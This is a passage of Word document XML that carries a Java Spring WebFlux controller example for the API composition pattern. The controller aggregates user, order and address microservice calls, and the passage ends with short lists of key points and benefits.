    <w:p w14:paraId="1DA8E0C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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@RequestMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"/user-profile"</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C4EBB7"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</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Controll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0793C41E"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4AD7777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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470EA50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rivate</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Builder</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p>
    <w:p w14:paraId="17DF1D53"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6574A9B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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@GetMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"/{userId}"</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479F533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public</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ProfileDTO</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getUserProfile</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@PathVariable</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</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4647D28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UserDTO</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> user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4C652AD6"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user-service/user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602935B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Us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7FFD0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1BF66DF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List</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OrderDTO</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> order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57E4AD9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order-service/orders/user/"</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7AE52B8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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Order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r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>collectList</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C510C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57205CB5"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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AddressDTO</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> address </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> webClientBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F91661F"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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uri</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"http://address-service/address/"</w:t>
      </w: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 xml:space="preserve"> userId</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580768FC"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retrieve</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bodyToMono</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AddressDTO</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F536E74"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC128FD"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> orders</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434E4B60"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r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tuple </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UserProfileDTO</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tuple</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getT1</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2</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(),</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tuple</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getT3</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAE7712" w14:textId="77777777"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A52556" w14:textId="6E84F699" w:rsidR="003E28EC" w:rsidRPr="003E28EC" w:rsidRDefault="003E28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9178"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6899F9"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45D853E8">
          <v:rect id="_x0000_i3150" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE792A3"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Key Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F1655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ually implemented in </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GraphQL layer</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or a </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dedicated composer service</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CA54B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Uses </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming</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parallel calls</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to reduce latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47209F3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Keeps services loosely coupled while presenting a unified API to consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4989A7D3"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1717CCFE">
          <v:rect id="_x0000_i3151" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F81A20"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Benefits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090F1A9D"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Simplifies client-side logic (only one API call).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237CBC79"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Centralized response formatting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035733B8"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Enables backend microservices to remain independent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4367D171"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lastRenderedPageBreak/>
        <w:pict w14:anchorId="071FDA5C">
